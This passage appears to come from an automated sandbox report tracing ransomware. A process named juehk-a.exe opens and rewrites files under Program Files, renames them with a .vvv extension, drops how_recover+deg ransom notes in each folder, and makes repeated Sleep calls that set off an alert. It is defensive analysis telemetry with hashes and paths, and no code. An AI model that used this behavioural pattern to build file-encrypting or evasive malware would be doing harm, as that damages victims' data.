13480.            pid: 1648
13481.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13482.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13483.          old_name: C:\Program Files\7-Zip\Lang\vi.txt
13484.          new_name: C:\Program Files\7-Zip\Lang\vi.txt.vvv
13485.            ads:
13486.          fid (ads:): 562949953519791
13487.          ntstatus: 0x0
13488.          CreateOptions: 0x0
13489.        file:
13490.          timestamp: 71678
13491.          mode: open
13492.          sequenceNumber: 962
13493.          value: C:\Program Files\7-Zip\Lang\zh-cn.txt
13494.          filesize: 13000
13495.          processinfo:
13496.            pid: 1648
13497.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13498.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13499.            ads:
13500.          fid (ads:): 562949953519792
13501.          ntstatus: 0x0
13502.          CreateOptions: 0x60
13503.        file:
13504.          timestamp: 71691
13505.          mode: close
13506.          sequenceNumber: 963
13507.          value: C:\Program Files\7-Zip\Lang\zh-cn.txt
13508.          filesize: 13422
13509.          md5sum: 76cba679241960daf782ad9456d6218a
13510.          sha1sum: 2c3085f7a69db80a775439c2f302401b5443faa8
13511.          processinfo:
13512.            pid: 1648
13513.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13514.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13515.            ads:
13516.          fid (ads:): 562949953519792
13517.          ntstatus: 0x0
13518.          CreateOptions: 0x0
13519.        file:
13520.          timestamp: 71714
13521.          mode: rename
13522.          sequenceNumber: 964
13523.          filesize: 13422
13524.          md5sum: 76cba679241960daf782ad9456d6218a
13525.          sha1sum: 2c3085f7a69db80a775439c2f302401b5443faa8
13526.          processinfo:
13527.            pid: 1648
13528.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13529.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13530.          old_name: C:\Program Files\7-Zip\Lang\zh-cn.txt
13531.          new_name: C:\Program Files\7-Zip\Lang\zh-cn.txt.vvv
13532.            ads:
13533.          fid (ads:): 562949953519792
13534.          ntstatus: 0x0
13535.          CreateOptions: 0x0
13536.        file:
13537.          timestamp: 71722
13538.          mode: open
13539.          sequenceNumber: 965
13540.          value: C:\Program Files\7-Zip\Lang\zh-tw.txt
13541.          filesize: 13087
13542.          processinfo:
13543.            pid: 1648
13544.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13545.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13546.            ads:
13547.          fid (ads:): 562949953519793
13548.          ntstatus: 0x0
13549.          CreateOptions: 0x60
13550.        file:
13551.          timestamp: 71730
13552.          mode: close
13553.          sequenceNumber: 966
13554.          value: C:\Program Files\7-Zip\Lang\zh-tw.txt
13555.          filesize: 13502
13556.          md5sum: fea28ced4cd01dfffe18af0ad321c152
13557.          sha1sum: 2441e839d3a498ca7c8c5ae97ec9ab63cc59007a
13558.          processinfo:
13559.            pid: 1648
13560.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13561.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13562.            ads:
13563.          fid (ads:): 562949953519793
13564.          ntstatus: 0x0
13565.          CreateOptions: 0x0
13566.        file:
13567.          timestamp: 71738
13568.          mode: rename
13569.          sequenceNumber: 967
13570.          filesize: 13502
13571.          md5sum: fea28ced4cd01dfffe18af0ad321c152
13572.          sha1sum: 2441e839d3a498ca7c8c5ae97ec9ab63cc59007a
13573.          processinfo:
13574.            pid: 1648
13575.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13576.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13577.          old_name: C:\Program Files\7-Zip\Lang\zh-tw.txt
13578.          new_name: C:\Program Files\7-Zip\Lang\zh-tw.txt.vvv
13579.            ads:
13580.          fid (ads:): 562949953519793
13581.          ntstatus: 0x0
13582.          CreateOptions: 0x0
13583.        file:
13584.          timestamp: 71751
13585.          mode: created
13586.          sequenceNumber: 968
13587.          value: C:\Program Files\7-Zip\Lang\how_recover+deg.txt
13588.          processinfo:
13589.            pid: 1648
13590.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13591.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13592.            ads:
13593.          fid (ads:): 844424930148780
13594.          ntstatus: 0x0
13595.          CreateOptions: 0x60
13596.        file:
13597.          timestamp: 71754
13598.          mode: close
13599.          sequenceNumber: 969
13600.          value: C:\Program Files\7-Zip\Lang\how_recover+deg.txt
13601.          filesize: 2673
13602.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
13603.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
13604.          processinfo:
13605.            pid: 1648
13606.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13607.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13608.            ads:
13609.          fid (ads:): 844424930148780
13610.          ntstatus: 0x0
13611.          CreateOptions: 0x0
13612.        file:
13613.          timestamp: 71759
13614.          mode: created
13615.          sequenceNumber: 970
13616.          value: C:\Program Files\7-Zip\Lang\how_recover+deg.html
13617.          processinfo:
13618.            pid: 1648
13619.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13620.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13621.            ads:
13622.          fid (ads:): 1407374883570130
13623.          ntstatus: 0x0
13624.          CreateOptions: 0x60
13625.        file:
13626.          timestamp: 71763
13627.          mode: close
13628.          sequenceNumber: 971
13629.          value: C:\Program Files\7-Zip\Lang\how_recover+deg.html
13630.          filesize: 9480
13631.          md5sum: a68c3caf0be8f1a393c697136926cfd4
13632.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
13633.          processinfo:
13634.            pid: 1648
13635.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13636.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13637.            ads:
13638.          fid (ads:): 1407374883570130
13639.          ntstatus: 0x0
13640.          CreateOptions: 0x0
13641.        file:
13642.          timestamp: 71767
13643.          mode: open
13644.          sequenceNumber: 972
13645.          value: C:\Program Files\7-Zip\License.txt
13646.          filesize: 1927
13647.          processinfo:
13648.            pid: 1648
13649.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13650.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13651.            ads:
13652.          fid (ads:): 562949953519711
13653.          ntstatus: 0x0
13654.          CreateOptions: 0x60
13655.        file:
13656.          timestamp: 71832
13657.          mode: close
13658.          sequenceNumber: 973
13659.          value: C:\Program Files\7-Zip\License.txt
13660.          filesize: 2350
13661.          md5sum: 57a9d6d0d6863848aaf0e35dcaadafa5
13662.          sha1sum: bd0330ea19d6b8ecf7546850dc79d03006d598fe
13663.          processinfo:
13664.            pid: 1648
13665.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13666.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13667.            ads:
13668.          fid (ads:): 562949953519711
13669.          ntstatus: 0x0
13670.          CreateOptions: 0x0
13671.        file:
13672.          timestamp: 71838
13673.          mode: rename
13674.          sequenceNumber: 974
13675.          filesize: 2350
13676.          md5sum: 57a9d6d0d6863848aaf0e35dcaadafa5
13677.          sha1sum: bd0330ea19d6b8ecf7546850dc79d03006d598fe
13678.          processinfo:
13679.            pid: 1648
13680.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13681.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13682.          old_name: C:\Program Files\7-Zip\License.txt
13683.          new_name: C:\Program Files\7-Zip\License.txt.vvv
13684.            ads:
13685.          fid (ads:): 562949953519711
13686.          ntstatus: 0x0
13687.          CreateOptions: 0x0
13688.        file:
13689.          timestamp: 71845
13690.          mode: open
13691.          sequenceNumber: 975
13692.          value: C:\Program Files\7-Zip\readme.txt
13693.          filesize: 1565
13694.          processinfo:
13695.            pid: 1648
13696.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13697.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13698.            ads:
13699.          fid (ads:): 562949953519712
13700.          ntstatus: 0x0
13701.          CreateOptions: 0x60
13702.        apicall:
13703.          timestamp: 71850
13704.          repeat: 500
13705.          sequenceNumber: 976
13706.          processinfo:
13707.            pid: 1648
13708.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13709.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13710.          dllname: kernel32.dll
13711.          apiname: Sleep
13712.          address: 0x0041ed5b
13713.        file:
13714.          timestamp: 71994
13715.          mode: close
13716.          sequenceNumber: 977
13717.          value: C:\Program Files\7-Zip\readme.txt
13718.          filesize: 1982
13719.          md5sum: e97e45c104f03321d4981d30e4b951a8
13720.          sha1sum: d14fd3487d0103d07469b38d8f64dc32f5d3363c
13721.          processinfo:
13722.            pid: 1648
13723.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13724.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13725.            ads:
13726.          fid (ads:): 562949953519712
13727.          ntstatus: 0x0
13728.          CreateOptions: 0x0
13729.        apicall:
13730.          timestamp: 72040
13731.          repeat: 600
13732.          sequenceNumber: 978
13733.          processinfo:
13734.            pid: 1648
13735.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13736.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13737.          dllname: kernel32.dll
13738.          apiname: Sleep
13739.          address: 0x0041ed5b
13740.        file:
13741.          timestamp: 72049
13742.          mode: rename
13743.          sequenceNumber: 979
13744.          filesize: 1982
13745.          md5sum: e97e45c104f03321d4981d30e4b951a8
13746.          sha1sum: d14fd3487d0103d07469b38d8f64dc32f5d3363c
13747.          processinfo:
13748.            pid: 1648
13749.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13750.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13751.          old_name: C:\Program Files\7-Zip\readme.txt
13752.          new_name: C:\Program Files\7-Zip\readme.txt.vvv
13753.            ads:
13754.          fid (ads:): 562949953519712
13755.          ntstatus: 0x0
13756.          CreateOptions: 0x0
13757.        file:
13758.          timestamp: 72125
13759.          mode: created
13760.          sequenceNumber: 980
13761.          value: C:\Program Files\7-Zip\how_recover+deg.txt
13762.          processinfo:
13763.            pid: 1648
13764.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13765.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13766.            ads:
13767.          fid (ads:): 1125899906859511
13768.          ntstatus: 0x0
13769.          CreateOptions: 0x60
13770.        file:
13771.          timestamp: 72131
13772.          mode: close
13773.          sequenceNumber: 981
13774.          value: C:\Program Files\7-Zip\how_recover+deg.txt
13775.          filesize: 2673
13776.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
13777.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
13778.          processinfo:
13779.            pid: 1648
13780.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13781.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13782.            ads:
13783.          fid (ads:): 1125899906859511
13784.          ntstatus: 0x0
13785.          CreateOptions: 0x0
13786.        file:
13787.          timestamp: 72139
13788.          mode: created
13789.          sequenceNumber: 982
13790.          value: C:\Program Files\7-Zip\how_recover+deg.html
13791.          processinfo:
13792.            pid: 1648
13793.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13794.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13795.            ads:
13796.          fid (ads:): 844424930154113
13797.          ntstatus: 0x0
13798.          CreateOptions: 0x60
13799.        file:
13800.          timestamp: 72143
13801.          mode: close
13802.          sequenceNumber: 983
13803.          value: C:\Program Files\7-Zip\how_recover+deg.html
13804.          filesize: 9480
13805.          md5sum: a68c3caf0be8f1a393c697136926cfd4
13806.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
13807.          processinfo:
13808.            pid: 1648
13809.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13810.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13811.            ads:
13812.          fid (ads:): 844424930154113
13813.          ntstatus: 0x0
13814.          CreateOptions: 0x0
13815.        file:
13816.          timestamp: 72235
13817.          mode: created
13818.          sequenceNumber: 984
13819.          value: C:\Program Files\Common Files\DESIGNER\how_recover+deg.txt
13820.          processinfo:
13821.            pid: 1648
13822.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13823.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13824.            ads:
13825.          fid (ads:): 844424930155988
13826.          ntstatus: 0x0
13827.          CreateOptions: 0x60
13828.        file:
13829.          timestamp: 72241
13830.          mode: close
13831.          sequenceNumber: 985
13832.          value: C:\Program Files\Common Files\DESIGNER\how_recover+deg.txt
13833.          filesize: 2673
13834.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
13835.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
13836.          processinfo:
13837.            pid: 1648
13838.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13839.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13840.            ads:
13841.          fid (ads:): 844424930155988
13842.          ntstatus: 0x0
13843.          CreateOptions: 0x0
13844.        file:
13845.          timestamp: 72260
13846.          mode: created
13847.          sequenceNumber: 986
13848.          value: C:\Program Files\Common Files\DESIGNER\how_recover+deg.html
13849.          processinfo:
13850.            pid: 1648
13851.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13852.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13853.            ads:
13854.          fid (ads:): 562949953479374
13855.          ntstatus: 0x0
13856.          CreateOptions: 0x60
13857.        file:
13858.          timestamp: 72266
13859.          mode: close
13860.          sequenceNumber: 987
13861.          value: C:\Program Files\Common Files\DESIGNER\how_recover+deg.html
13862.          filesize: 9480
13863.          md5sum: a68c3caf0be8f1a393c697136926cfd4
13864.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
13865.          processinfo:
13866.            pid: 1648
13867.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13868.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13869.            ads:
13870.          fid (ads:): 562949953479374
13871.          ntstatus: 0x0
13872.          CreateOptions: 0x0
13873.        file:
13874.          timestamp: 72272
13875.          mode: created
13876.          sequenceNumber: 988
13877.          value: C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+deg.txt
13878.          processinfo:
13879.            pid: 1648
13880.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13881.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13882.            ads:
13883.          fid (ads:): 844424930212990
13884.          ntstatus: 0x0
13885.          CreateOptions: 0x60
13886.        file:
13887.          timestamp: 72278
13888.          mode: close
13889.          sequenceNumber: 989
13890.          value: C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+deg.txt
13891.          filesize: 2673
13892.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
13893.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
13894.          processinfo:
13895.            pid: 1648
13896.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13897.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13898.            ads:
13899.          fid (ads:): 844424930212990
13900.          ntstatus: 0x0
13901.          CreateOptions: 0x0
13902.        file:
13903.          timestamp: 72287
13904.          mode: created
13905.          sequenceNumber: 990
13906.          value: C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+deg.html
13907.          processinfo:
13908.            pid: 1648
13909.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13910.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13911.            ads:
13912.          fid (ads:): 844424930212992
13913.          ntstatus: 0x0
13914.          CreateOptions: 0x60
13915.        file:
13916.          timestamp: 72294
13917.          mode: close
13918.          sequenceNumber: 991
13919.          value: C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+deg.html
13920.          filesize: 9480
13921.          md5sum: a68c3caf0be8f1a393c697136926cfd4
13922.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
13923.          processinfo:
13924.            pid: 1648
13925.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13926.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13927.            ads:
13928.          fid (ads:): 844424930212992
13929.          ntstatus: 0x0
13930.          CreateOptions: 0x0
13931.        file:
13932.          timestamp: 72300
13933.          mode: created
13934.          sequenceNumber: 992
13935.          value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+deg.txt
13936.          processinfo:
13937.            pid: 1648
13938.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13939.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13940.            ads:
13941.          fid (ads:): 3377699720608905
13942.          ntstatus: 0x0
13943.          CreateOptions: 0x60
13944.        file:
13945.          timestamp: 72306
13946.          mode: close
13947.          sequenceNumber: 993
13948.          value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+deg.txt
13949.          filesize: 2673
13950.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
13951.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
13952.          processinfo:
13953.            pid: 1648
13954.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13955.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13956.            ads:
13957.          fid (ads:): 3377699720608905
13958.          ntstatus: 0x0
13959.          CreateOptions: 0x0
13960.        file:
13961.          timestamp: 72313
13962.          mode: created
13963.          sequenceNumber: 994
13964.          value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+deg.html
13965.          processinfo:
13966.            pid: 1648
13967.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13968.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13969.            ads:
13970.          fid (ads:): 4503599627451537
13971.          ntstatus: 0x0
13972.          CreateOptions: 0x60
13973.        apicall:
13974.          timestamp: 72343
13975.          repeat: 700
13976.          sequenceNumber: 995
13977.          processinfo:
13978.            pid: 1648
13979.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13980.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13981.          dllname: kernel32.dll
13982.          apiname: Sleep
13983.          address: 0x0041ed5b
13984.        apicall:
13985.          timestamp: 72509
13986.          repeat: 800
13987.          sequenceNumber: 996
13988.          processinfo:
13989.            pid: 1648
13990.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13991.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13992.          dllname: kernel32.dll
13993.          apiname: Sleep
13994.          address: 0x0041ed5b
13995.        file:
13996.          timestamp: 72577
13997.          mode: close
13998.          sequenceNumber: 997
13999.          value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+deg.html
14000.          filesize: 9480
14001.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14002.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14003.          processinfo:
14004.            pid: 1648
14005.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14006.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14007.            ads:
14008.          fid (ads:): 4503599627451537
14009.          ntstatus: 0x0
14010.          CreateOptions: 0x0
14011.        file:
14012.          timestamp: 72583
14013.          mode: created
14014.          sequenceNumber: 998
14015.          value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+deg.txt
14016.          processinfo:
14017.            pid: 1648
14018.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14019.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14020.            ads:
14021.          fid (ads:): 2251799813766313
14022.          ntstatus: 0x0
14023.          CreateOptions: 0x60
14024.        file:
14025.          timestamp: 72588
14026.          mode: close
14027.          sequenceNumber: 999
14028.          value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+deg.txt
14029.          filesize: 2673
14030.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14031.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14032.          processinfo:
14033.            pid: 1648
14034.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14035.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14036.            ads:
14037.          fid (ads:): 2251799813766313
14038.          ntstatus: 0x0
14039.          CreateOptions: 0x0
14040.        file:
14041.          timestamp: 72593
14042.          mode: created
14043.          sequenceNumber: 1000
14044.          value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+deg.html
14045.          processinfo:
14046.            pid: 1648
14047.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14048.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14049.            ads:
14050.          fid (ads:): 2251799813766357
14051.          ntstatus: 0x0
14052.          CreateOptions: 0x60
14053.        file:
14054.          timestamp: 72598
14055.          mode: close
14056.          sequenceNumber: 1001
14057.          value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+deg.html
14058.          filesize: 9480
14059.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14060.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14061.          processinfo:
14062.            pid: 1648
14063.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14064.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14065.            ads:
14066.          fid (ads:): 2251799813766357
14067.          ntstatus: 0x0
14068.          CreateOptions: 0x0
14069.        file:
14070.          timestamp: 72613
14071.          mode: created
14072.          sequenceNumber: 1002
14073.          value: C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+deg.txt
14074.          processinfo:
14075.            pid: 1648
14076.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14077.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14078.            ads:
14079.          fid (ads:): 562949953521097
14080.          ntstatus: 0x0
14081.          CreateOptions: 0x60
14082.        file:
14083.          timestamp: 72617
14084.          mode: close
14085.          sequenceNumber: 1003
14086.          value: C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+deg.txt
14087.          filesize: 2673
14088.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14089.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14090.          processinfo:
14091.            pid: 1648
14092.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14093.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14094.            ads:
14095.          fid (ads:): 562949953521097
14096.          ntstatus: 0x0
14097.          CreateOptions: 0x0
14098.        file:
14099.          timestamp: 72622
14100.          mode: created
14101.          sequenceNumber: 1004
14102.          value: C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+deg.html
14103.          processinfo:
14104.            pid: 1648
14105.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14106.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14107.            ads:
14108.          fid (ads:): 562949953521098
14109.          ntstatus: 0x0
14110.          CreateOptions: 0x60
14111.        file:
14112.          timestamp: 72626
14113.          mode: close
14114.          sequenceNumber: 1005
14115.          value: C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+deg.html
14116.          filesize: 9480
14117.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14118.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14119.          processinfo:
14120.            pid: 1648
14121.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14122.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14123.            ads:
14124.          fid (ads:): 562949953521098
14125.          ntstatus: 0x0
14126.          CreateOptions: 0x0
14127.        file:
14128.          timestamp: 72657
14129.          mode: created
14130.          sequenceNumber: 1006
14131.          value: C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+deg.txt
14132.          processinfo:
14133.            pid: 1648
14134.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14135.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14136.            ads:
14137.          fid (ads:): 562949953521099
14138.          ntstatus: 0x0
14139.          CreateOptions: 0x60
14140.        file:
14141.          timestamp: 72662
14142.          mode: close
14143.          sequenceNumber: 1007
14144.          value: C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+deg.txt
14145.          filesize: 2673
14146.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14147.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14148.          processinfo:
14149.            pid: 1648
14150.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14151.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14152.            ads:
14153.          fid (ads:): 562949953521099
14154.          ntstatus: 0x0
14155.          CreateOptions: 0x0
14156.        apicall:
14157.          timestamp: 72733
14158.          repeat: 900
14159.          sequenceNumber: 1008
14160.          processinfo:
14161.            pid: 1648
14162.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14163.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14164.          dllname: kernel32.dll
14165.          apiname: Sleep
14166.          address: 0x0041ed5b
14167.        file:
14168.          timestamp: 72961
14169.          mode: created
14170.          sequenceNumber: 1009
14171.          value: C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+deg.html
14172.          processinfo:
14173.            pid: 1648
14174.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14175.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14176.            ads:
14177.          fid (ads:): 562949953521100
14178.          ntstatus: 0x0
14179.          CreateOptions: 0x60
14180.        file:
14181.          timestamp: 72966
14182.          mode: close
14183.          sequenceNumber: 1010
14184.          value: C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+deg.html
14185.          filesize: 9480
14186.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14187.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14188.          processinfo:
14189.            pid: 1648
14190.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14191.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14192.            ads:
14193.          fid (ads:): 562949953521100
14194.          ntstatus: 0x0
14195.          CreateOptions: 0x0
14196.        apicall:
14197.          timestamp: 72975
14198.          repeat: 1000
14199.          sequenceNumber: 1011
14200.          processinfo:
14201.            pid: 1648
14202.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14203.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14204.          dllname: kernel32.dll
14205.          apiname: Sleep
14206.          address: 0x0041ed5b
14207.        malicious-alert:
14208.          classtype: High Repeated Sleep Calls
14209.          weight: 0
14210.          ruleid: 5202 : High repeated sleep calls ; High repeated number of sleep calls
14211.          msg: High repeated number of sleep calls
14212.          display-msg: High repeated sleep calls
14213.        file:
14214.          timestamp: 73040
14215.          mode: open
14216.          sequenceNumber: 1012
14217.          value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS
14218.          filesize: 15067
14219.          processinfo:
14220.            pid: 1648
14221.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14222.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14223.            ads:
14224.          fid (ads:): 562949953495997
14225.          ntstatus: 0x0
14226.          CreateOptions: 0x60
14227.        file:
14228.          timestamp: 73389
14229.          mode: close
14230.          sequenceNumber: 1013
14231.          value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS
14232.          filesize: 15486
14233.          md5sum: 6028b8017e2b1cdf121534356ff65e7e
14234.          sha1sum: 5a5f960a1cab09e09c369e00fe83bc6bb3df801a
14235.          processinfo:
14236.            pid: 1648
14237.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14238.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14239.            ads:
14240.          fid (ads:): 562949953495997
14241.          ntstatus: 0x0
14242.          CreateOptions: 0x0
14243.        file:
14244.          timestamp: 73425
14245.          mode: rename
14246.          sequenceNumber: 1014
14247.          filesize: 15486
14248.          md5sum: 6028b8017e2b1cdf121534356ff65e7e
14249.          sha1sum: 5a5f960a1cab09e09c369e00fe83bc6bb3df801a
14250.          processinfo:
14251.            pid: 1648
14252.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14253.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14254.          old_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS
14255.          new_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS.vvv
14256.            ads:
14257.          fid (ads:): 562949953495997
14258.          ntstatus: 0x0
14259.          CreateOptions: 0x0
14260.        file:
14261.          timestamp: 73440
14262.          mode: open
14263.          sequenceNumber: 1015
14264.          value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG
14265.          filesize: 1061
14266.          processinfo:
14267.            pid: 1648
14268.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14269.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14270.            ads:
